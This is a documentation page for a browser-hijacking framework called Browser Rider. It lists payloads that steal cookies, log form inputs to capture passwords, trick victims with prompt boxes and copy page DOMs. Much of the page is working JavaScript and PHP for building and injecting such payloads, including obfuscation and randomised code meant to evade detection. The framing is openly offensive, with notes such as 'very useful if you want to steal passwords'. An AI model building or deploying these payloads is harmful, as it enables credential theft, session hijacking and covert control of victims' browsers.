Browser Rider Payloads
From Engineering For Fun
Contents |
Targeted payloads & autoload payloads
A payload can perform two different attacks.
- The first one is a targeted attack where in the administration panel you select manually a zombie you want to target and send him your malicious code.
- The second one is an autoload attack where the payload is automatically sent to the zombie when he visits an infected page.
Existing payloads
| payload name | description | author |
|---|---|---|
| append_iframe | append an iframe to the target's DOM | Benjilenoob |
| auto_refresh | automatically reload BrowserRider to check for updates | Benjilenoob |
| box_alert | load an alert box | Benjilenoob |
| box_prompt | load a prompt box to ask something and save the answer | Benjilenoob |
| cookie_stealing | automatically steals your zombies' cookie | Benjilenoob |
| exec_javascript | executes some javascript code | Benjilenoob |
| fieldlogger | Steals data from forms | X-Tense |
| get_DOM | Downloads the victim page's DOM | Benjilenoob |
| keep_alive | Puts targets in a frame | Benjilenoob |
Payload: append_iframe
append_iframe is a simple payload that adds a iframe on the zombie infected page. It can be used to exploit a cross-site request forgery using method GET or to send a file to download to the zombie.
Payload: auto_refresh
auto_refresh is a very important payload. It is the payload that allow Browser Rider to send javascript on the fly to the zombie. What auto_refresh does is, it creates a script tag that links to Browser Rider, the javascript is then executed if there's any and then auto_refresh remove the script tag and recreate a new and so on.
Payload: box_prompt
box_prompt's purpose is to send a prompt() box to the zombie with the message you have set. The zombie types the answer and validate the box. From the administration panel you retrieve the zombie's reply.
This payload can be used to ask the password for example.
Payload: cookie_stealing
cookie_stealing steals the zombie's cookie and save it in Browser Rider, you can then from the administration get it.
This is very useful if you want to hijack the zombie's session using his cookie.
Payload: exec_javascript
Executes any javascript code you enter in a text box to a selected zombie.
Payload: fieldlogger
Steals the inputs a victim has entered in a form. This payload is very useful if you want to steal passwords or private information. Thanks to X-Tense for providing us with this payload.
Payload: get_DOM
Steals the HTML code source of your targets. You can then view it in the administration panel. With this payload you could see pages you don't necessarily have access to.
Payload: keep_alive
Puts your targets in an iframe so that even if they visit an other page which is not infected by the Browser Rider, we still keep the contact with our zombie.
Writing a payload in Browser Rider
When you download Browser they are a list of public payloads ready to be fired to your zombies. However you will probably want to write your own ones. They are a few things to understand in order to be able to do so.
First of all, any payload you write must be placed in the folder /payloads located in the /lib/plouf/ directory of the project. Each payload should have at least a PHP file used as a controller for the attack and to manage the payload in the administration panel. In this same folder you will find two sub folders /payloads/javascript/ and /payloads/templates, the first one will contain the javascript exploit and the second one the template to manage the payload in the administration.
As an example let's take the payload box_prompt, we have three files related to it:
- /payloads/box_prompt.php the controller
- /payloads/javascript/box_prompt.js the actual javascript code (exploit)
- /payloads/templates/box_prompt.tpl the template to manage the payload in the administration panel
If you are familiar with PHP, I suggest you to check out directly existing payloads given with the tool. You should be able to pick it up how it works.
Writing the Javascript exploit
Create a new .js file in the /payloads/javascript folder and start coding your exploit :)
As an example let's have a look at append_iframe.js
function {$FUNCTIONNAME}()
{ldelim}
var b = document.getElementsByTagName("body")[0];
var i = document.createElement("iframe");
var as = document.createAttribute("src");
as.nodeValue = "{$SRC}";
i.setAttributeNode(as);
var st = document.createAttribute("style");
st.nodeValue = "width:1px;height:1px;";
i.setAttributeNode(st);
b.appendChild(i);
{rdelim};
window.onload = {$FUNCTIONNAME}();</javascript>
In Browser Rider, the exploit is passed on to Smarty before being sent to the zombie(s). Refer yourself to the Smarty Section if you don't know what it is.
In this simple exploit that simply append a frame on the victim's page, we notice {$FUNCTIONNAME} and {$SRC}. Those variables will be generated and set by the payload controller through Smarty. In our case {$FUNCTIONNAME} is a randomly generated string and {$SRC} is the url where the iframe links.
$this->setRenderData('FUNCTIONNAME',strrand(3,5,S_LETTERS)); $this->setRenderData('SRC',htmlentities($result['src']));
Writing the controller
Inheritance and Interface
In order to run any payload in the framework, this payload needs to extends (inherit) the PayloadModule class and implement the PayloadInterface interface.
Example:
class box_alert extends PayloadModule implements PayloadInterface
PayloadModule class
This class is located in /lib/plouf/PayloadModule.php, it is the super class for all the payload modules and itself extends the class ControlModule (more details about this one given later).
This class provides the payload with the methods:
| public function setRenderData($name, $data) |
|---|
| Assign data to render to the javascript |
$this->setRenderData('ZOMBIE_IP', $this->http->getIPAddress()); |
| public function getRenderData() |
|---|
| Return the data to assign to the javascript |
$data=$this->getRenderData(); |
| protected function attachZombieToPayload($payload_name, $zombie_ip) |
|---|
| Set a zombie to be attacked with a given payload |
$this->attachZombieToPayload('box_prompt', '127.0.0.1'); |
| public function useLibrary($library) |
|---|
| Assign a new librairy to use for the payload |
$this->useLibrary('AttackAPI'); |
PayloadInterface interface
This interface is located in /lib/plouf/PayloadModule.php Payloads need to follow this interface to follow a common template so that the framework will be capable of running each of them. This implies that each of the payloads you will code have the following methods:
- public function install();
- public function remove();
- public function main();
- public function run();
The install()function is used to when installing the payload. As an example let's have a look at the box_alert payload:
/*
* This function is define in the interface. We have to implement it in this class.
* It has for purpose to install a the payload. We can then set do here everything needed to install
* the payload.
*
* In our case, we are going to create two tables.
*/
public function install()
{
//the first table will be to contain the messages to be load individually to our zombies
$SQLQuery = "CREATE TABLE IF NOT EXISTS pay_box_alert (
id INTEGER NOT NULL AUTO_INCREMENT,
ip VARCHAR(15) NOT NULL,
msg TEXT NOT NULL,
done INT(1) DEFAULT 0,
PRIMARY KEY(id)
)";
$this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__);
//the second table is for the automatic loading module, so that we can set a message that will be
//load to every zombie EACH time he visits an infected page.
$SQLQuery = "CREATE TABLE IF NOT EXISTS pay_box_alert_autoload (
message TEXT NOT NULL,
date INT(10)
)";
$this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__);
}
As you can notice, we create two tables required for the payload to work.
The remove() function is called by the framework when uninstalling a payload, let's check out again box_alert's code:
/* * This function uninstall the payload * We remove the two table we had install previously using the function install() */ public function remove() { $SQLQuery = "DROP TABLE IF EXISTS pay_box_alert, pay_box_alert_autoload"; $this->db->query($SQLQuery) or die(mysql_errno()); }
Here we drop the two tables created in during the installation to remove the payload.
The main() method is the controller of the template. That's what manages all the stuff like inserting new rows in the database etc. In the case of box_alert we gather the message the hacker (you) want to sent to the zombie and insert it into our database.
/* * This function is the controller to the template view * we display in the administration panel. */ public function main() { $ip=$this->http->getCleanString('ip');//we retrieve the ip of the target to attack with the payload //IF there is an 'ip' then we display the individual configuration if($ip!=false) { $this->setRenderData('INDIVIDUAL',1);//we assign the variable $INDIVIDUAL to smarty $this->setRenderData('IP',$ip);//we assign the variable $IP to smarty //IF a new message is send we update the database $msg = $this->http->getCleanString('msg','POST'); if($msg!=false)//we check that the var 'msg' has been sent by POST { $this->setRenderData('UPDATED',1); // we update our database $SQLQuery = "INSERT INTO pay_box_alert (ip, msg) VALUES ('$ip', '$msg')"; $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__); // we link our target to our payload $this->attachZombieToPayload('box_alert',$ip); } } //IF NOT we display the form to set the message to automatically load else { //we check if a message to set has been sent if(($msg = $this->http->getCleanString('msg','POST'))!=false) { $date = date('Ymdis'); $SQLQuery = "INSERT INTO pay_box_alert_autoload (message, date) VALUES ('$msg', '$date')"; $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__); $this->setRenderData('AUTOLOAD',1); } } }
The run() function is used by the tool when loading the payload to the zombie. In the case of box_alert, we check if they are any messages to send to the zombie and if they are we send him an Javascript alert() box.
/* * We uses this function to run the payload. You can see it as the payload * controller. */ public function run() { $ip = addslashes($_SERVER['REMOTE_ADDR']);//we retrieve our target's ip address /** first we check for individual messages to send **/ $SQLQuery = "SELECT id, msg FROM pay_box_alert WHERE ip='$ip' AND done=0"; $Query = $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__); if($this->db->numRows($Query)!=0) { //we retrieve all the messages to load to the target while($message = $this->db->fetchAssoc($Query)) { //we update the table to set the message as sent $id=addslashes($message['id']); $SQLQuery="UPDATE pay_box_alert SET done='1' WHERE id='$id'";//once load we set them as loaded, this avoid sending twice the same message $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__); //we display the message box $msg = addslashes($message['msg']); //THE ATTACK :p echo "alert(\"$msg\");"; } } /** then we check if the module is in autoload mode **/ $SQLQuery = "SELECT is_automatic FROM payload WHERE name='box_alert' AND is_automatic='1'"; $Query = $this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__); if($this->db->numRows($Query)!=0) { //if the payload is in automatic mode we load it! $SQLQuery='SELECT message from pay_box_alert_autoload ORDER BY date DESC'; $Query=$this->db->query($SQLQuery) or $this->db->dieError(__FILE__, __LINE__); $message=$this->db->fetchAssoc($Query); if(!empty($message)) { $message=addslashes($message['message']); //THE ATTACK :p echo "alert(\"$message\");"; } } }
The payload's attributes
public $smarty=false;//the plugin requires smarty public $description;//the plugin description public $obfuscator=null;//the name of the obfuscator to use public $obfuscator_options=null;//the options of the obfuscator to use public $individual=false;//the payload can be loaded individually public $proc_name;//the processus name public $auto_load=false;//can the payload be automatic public $libraries=array();//librairies to display to make the payload work public $minify=true;//if the payload is not obfuscated we compress/minify it with JSMin
Using existing javascript libraries
All the libraries must be placed in /payloads/libraries, you can then call them using the useLibrary() function present in PayloadModule.
$this->useLibrary('AttackAPI-standalone');
| name | description | author |
|---|---|---|
| AttackAPI-standalone | AttackAPI provides simple and intuitive programmable interface for composing attack vectors with JavaScript and other client and server related technologies. | Petko Petkov |
| jquery-1.2.6.min | jQuery is a fast and concise JavaScript Library that simplifies HTML document traversing, event handling, animating, and Ajax interactions for rapid web development. | jquery.com |
| mootools-1.2-core | a super lightweight web2.0 javascript framework. | mootools.net |
| jquery.timers | jQuery Timers is a high level abstraction of setTimeout and setInterval. | unknown |
Some examples
cookie_stealing
public function __construct() { parent::__construct();//we construct the parent class $this->description='Steal targets\' cookie';//the description of the payload $this->smarty=true;//the payload uses the smarty template $this->obfuscator='DeanEdwards';//name of the obfuscator i'm using $this->auto_load=true;//the payload can be loaded automatically $this->db=Database::getInstance();//we retrieve the database instance }
exec_javascript
public function __construct() { parent::__construct(); $this->db = Database::getInstance();//we get the database instance $this->individual=true;//the payload can be load individually $this->description='Executes javascript'; $this->smarty=false;//the payload do not use smarty $this->auto_load=true;//the payload can be loaded automatically }
auto_refresh
public function __construct() { parent::__construct();//we construct the parent class $this->description='Automatically reload BrowserRider to check for updates (important)';//the description of the payload $this->smarty=true;//the payload uses the smarty template $this->obfuscator='DeanEdwards';//name of the obfuscator i'm using $this->auto_load=true;//the payload can be loaded automatically }
Writing the Administration Template
Just like writing the javascript exploit, create a .tpl file in the /payloads/templates/ folder. This template also uses Smarty (refer yourself at the adequate section if you don't what it is).
Let's have a quick look at append_iframe.tpl
<h2>Append an Iframe to the DOM</h2> <p> This payload appends a iframe to the DOM. It can be useful if you want to make your target download something :) </p> {if $IP!=''} <form action="append_iframe?ip={$IP}" method="POST"> <input type="text" name="src" /> <input type="submit" value="append" /> </form> <br /> {if $SENT!=''}Payload sent{/if} {else} <p> <b>This payload only works with targeted zombies, you can't configure it to be automatically loaded.</b> </p> {/if}
It's pretty simple, if the $IP has been set by the controller we display the form otherwise we throw an error message saying that the payload can only be used to target selected zombies, no autoload.
Obfuscation
In Browser Rider you can use already existent packers or develop your owns. To use the obfuscator with the payload is pretty easy, just set its attribute $this->obfuscator to what even obfuscator you want.
For example if you want to use the DeanEdwards:
$this->obfuscator='DeanEdwards';
Any obfuscator must be placed in the folder /lib/plouf/obfuscators/
To give you an example of how an automatically obfuscated payload looks like:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0 6="4://3/2/5/9.7?a=1";0 8="b";',12,12,'var||projects|localhost|http|BrowserRider|framework|js|nodename|RqAarSj|ar|xCU'.split('|'),0,{}))
Polymorphism
Definition: The occurrence of many forms of the same species.
Because we have the ability to generate the JavaScript code with PHP (in most of cases we make use of Smarty) we can modify the way a payload will run each time and how it will look like.
Let's take a very simple example: javascript code of payload auto_refresh
var framework = "{$BROWSERRIDER_URL}";
var nodename = "{$NODENAME}";
{if $ISRUNNING!=1}
var {$INCREMENTOR}=0;
var {$OLDNODENAME};
function {$FUNCTION_NAME}()
{ldelim}
var b = document.getElementsByTagName("body")[0];
if({$INCREMENTOR}!=0)
{ldelim}
var s = document.getElementsByName({$OLDNODENAME})[0];
b.removeChild(s);
{rdelim}
var s = document.createElement("script");
var as = document.createAttribute("src");
as.nodeValue = framework;
s.setAttributeNode(as);
var an = document.createAttribute("name");
an.nodeValue = nodename;
s.setAttributeNode(an);
b.appendChild(s);
{$INCREMENTOR}++;
{$OLDNODENAME} = nodename;
{rdelim};
window.setInterval("{$FUNCTION_NAME}()", 3000);
{/if}
We can see stuff like {$OLDNODENAME} or {$FUNCTION_NAME} which will be randomly generated by the payload controller (run() function), so each time our payload runs it will look a bit different.
